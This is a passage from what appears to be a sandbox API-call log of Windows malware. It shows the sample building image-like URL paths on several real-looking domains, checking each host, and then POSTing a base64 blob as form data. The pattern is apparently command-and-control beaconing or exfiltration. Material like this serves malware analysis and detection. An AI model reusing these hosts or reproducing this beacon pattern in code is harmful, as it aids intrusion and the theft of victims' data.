(lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0081.363] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0081.363] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0081.363] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0081.363] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0081.363] InternetConnectW (hInternet=0xcc0004, lpszServerName="wpakademi.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0081.363] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0081.363] wsprintfW (in: param_1=0x3010000, param_2="%s" | out: param_1="content/images/zumomeka.bmp") returned 27 [0081.363] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="content/images/zumomeka.bmp", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0081.363] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3000000*, dwOptionalLength=0x24c | out: lpOptional=0x3000000*) returned 1 [0081.659] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0081.659] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0081.659] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.659] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.771] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0081.771] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.cakav.hu") returned 19 [0081.771] lstrcpyW (in: lpString1=0x2e8d880, lpString2="static" | out: lpString1="static") returned="static" [0081.771] lstrcpyW (in: lpString1=0x2e8da80, lpString2="tmp" | out: lpString1="tmp") returned="tmp" [0081.771] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="es" | out: lpString1="es") returned="es" [0081.771] lstrcatW (in: lpString1="es", lpString2="am" | out: lpString1="esam") returned="esam" [0081.771] lstrcpyW (in: lpString1=0x2e8de80, lpString2="bmp" | out: lpString1="bmp") returned="bmp" [0081.771] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.cakav.hu/static/tmp/esam.bmp") returned 39 [0081.771] lstrlenW (lpString="http://www.cakav.hu/static/tmp/esam.bmp") returned 39 [0081.771] lstrcpyW (in: lpString1=0x2e8d618, lpString2="static/tmp/esam.bmp" | out: lpString1="static/tmp/esam.bmp") returned="static/tmp/esam.bmp" [0081.771] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0081.771] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0081.771] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.cakav.hu", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0081.771] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0081.771] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0081.771] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0082.290] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0082.291] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0082.291] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0082.292] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0082.292] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0082.292] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3000000 [0082.293] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0082.293] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0082.293] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0082.293] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0082.293] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0082.293] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.cakav.hu", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0082.293] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0082.293] wsprintfW (in: param_1=0x3010000, param_2="%s" | out: param_1="static/tmp/esam.bmp") returned 19 [0082.294] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="static/tmp/esam.bmp", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0082.294] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3000000*, dwOptionalLength=0x24c | out: lpOptional=0x3000000*) returned 1 [0082.825] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0082.827] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0082.827] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.828] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.828] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0082.828] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.mimid.cz") returned 19 [0082.828] lstrcpyW (in: lpString1=0x2e8d880, lpString2="news" | out: lpString1="news") returned="news" [0082.828] lstrcpyW (in: lpString1=0x2e8da80, lpString2="image" | out: lpString1="image") returned="image" [0082.828] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="fu" | out: lpString1="fu") returned="fu" [0082.828] lstrcatW (in: lpString1="fu", lpString2="he" | out: lpString1="fuhe") returned="fuhe" [0082.828] lstrcatW (in: lpString1="fuhe", lpString2="se" | out: lpString1="fuhese") returned="fuhese" [0082.828] lstrcatW (in: lpString1="fuhese", lpString2="so" | out: lpString1="fuheseso") returned="fuheseso" [0082.828] lstrcatW (in: lpString1="fuheseso", lpString2="da" | out: lpString1="fuhesesoda") returned="fuhesesoda" [0082.828] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0082.828] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.mimid.cz/news/image/fuhesesoda.jpg") returned 45 [0082.828] lstrlenW (lpString="http://www.mimid.cz/news/image/fuhesesoda.jpg") returned 45 [0082.829] lstrcpyW (in: lpString1=0x2e8d618, lpString2="news/image/fuhesesoda.jpg" | out: lpString1="news/image/fuhesesoda.jpg") returned="news/image/fuhesesoda.jpg" [0082.829] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0082.829] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0082.829] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.mimid.cz", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0082.829] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0082.829] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0082.829] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0083.724] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0083.724] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0083.724] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0083.726] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0083.726] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0083.726] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3000000 [0083.727] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0083.727] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0083.727] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0083.727] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0083.727] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0083.727] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.mimid.cz", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0083.727] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0083.727] wsprintfW (in: param_1=0x3010000, param_2="%s" | out: param_1="news/image/fuhesesoda.jpg") returned 25 [0083.727] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="news/image/fuhesesoda.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0083.728] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3000000*, dwOptionalLength=0x24c | out: lpOptional=0x3000000*) returned 1 [0085.595] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0085.647] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0085.647] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.647] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.647] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0085.647] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://6chen.cn") returned 15 [0085.647] lstrcpyW (in: lpString1=0x2e8d880, lpString2="uploads" | out: lpString1="uploads") returned="uploads" [0085.648] lstrcpyW (in: lpString1=0x2e8da80, lpString2="imgs" | out: lpString1="imgs") returned="imgs" [0085.648] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="im" | out: lpString1="im") returned="im" [0085.648] lstrcatW (in: lpString1="im", lpString2="da" | out: lpString1="imda") returned="imda" [0085.648] lstrcatW (in: lpString1="imda", lpString2="im" | out: lpString1="imdaim") returned="imdaim" [0085.648] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0085.648] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://6chen.cn/uploads/imgs/imdaim.png") returned 39 [0085.648] lstrlenW (lpString="http://6chen.cn/uploads/imgs/imdaim.png") returned 39 [0085.648] lstrcpyW (in: lpString1=0x2e8d618, lpString2="uploads/imgs/imdaim.png" | out: lpString1="uploads/imgs/imdaim.png") returned="uploads/imgs/imdaim.png" [0085.648] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0085.648] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0085.648] InternetConnectW (hInternet=0xcc0008, lpszServerName="6chen.cn", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0085.648] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0085.648] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0085.648] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0089.378] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0089.378] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0089.378] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0089.380] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0089.380] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0089.380] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3000000 [0089.380] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0089.380] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0089.380] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0089.381] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0089.381] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0089.381] InternetConnectW (hInternet=0xcc0004, lpszServerName="6chen.cn", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0089.381] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0089.382] wsprintfW (in: param_1=0x3010000, param_2="%s" | out: param_1="uploads/imgs/imdaim.png") returned 23 [0089.382] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="uploads/imgs/imdaim.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0089.382] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3000000*, dwOptionalLength=0x24c | out: lpOptional=0x3000000*) returned 1 [0089.926] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0089.927] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0089.927] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.927] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.928] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0089.928] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://goodapd.website") returned 22 [0089.928] lstrcpyW (in: lpString1=0x2e8d880, lpString2="static" | out: lpString1="static") returned="static" [0089.928] lstrcpyW (in: lpString1=0x2e8da80, lpString2="imgs" | out: lpString1="imgs") returned="imgs" [0089.928] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="me" | out: lpString1="me") returned="me" [0089.928] lstrcatW (in: lpString1="me", lpString2="me" | out: lpString1="meme") returned="meme" [0089.928] lstrcatW (in: lpString1="meme", lpString2="th" | out: lpString1="memeth") returned="memeth" [0089.928] lstrcatW (in: lpString1="memeth", lpString2="ke" | out: lpString1="memethke") returned="memethke" [0089.928] lstrcpyW (in: lpString1=0x2e8de80, lpString2="gif" | out: lpString1="gif") returned="gif" [0089.928] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://goodapd.website/static/imgs/memethke.gif") returned 47 [0089.928] lstrlenW (lpString="http://goodapd.website/static/imgs/memethke.gif") returned 47 [0089.928] lstrcpyW (in: lpString1=0x2e8d618, lpString2="static/imgs/memethke.gif" | out: lpString1="static/imgs/memethke.gif") returned="static/imgs/memethke.gif" [0089.928] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0089.928] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0089.929] InternetConnectW (hInternet=0xcc0008, lpszServerName="goodapd.website", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0089.929] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0089.929] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0089.929] HttpSendRequestW (hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0) returned 0 [0089.993] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0089.993] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0089.993] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0089.994] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3000000 [0089.994] lstrlenA 